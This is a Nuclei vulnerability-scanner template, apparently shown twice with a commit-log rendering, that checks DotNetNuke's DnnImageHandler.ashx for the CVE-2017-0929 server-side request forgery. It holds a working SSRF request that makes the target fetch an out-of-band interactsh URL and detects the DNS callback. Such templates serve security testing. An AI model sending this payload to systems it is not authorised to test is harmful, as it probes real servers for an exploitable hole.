nuclei-templates/cves/2017/CVE-2017-0929.yaml

id: CVE-2017-0929
info:
  name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
  severity: medium
  reference:
    - https://hackerone.com/reports/482634
  author: CharanRayudu, meme-lord
  tags: cve,cve2017,ssrf,dotnetnuke

requests:
  - method: GET
    path:
      - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}'
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
Added CVE-2017-0929 (DNN SSRF) 2021-10-27 11:45:18 +00:00			`id: CVE-2017-0929`
			`info:`
			`name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)`
			`severity: medium`
			`reference:`
			`- https://hackerone.com/reports/482634`
			`author: CharanRayudu, meme-lord`
			`tags: cve,cve2017,ssrf,dotnetnuke`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}'`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`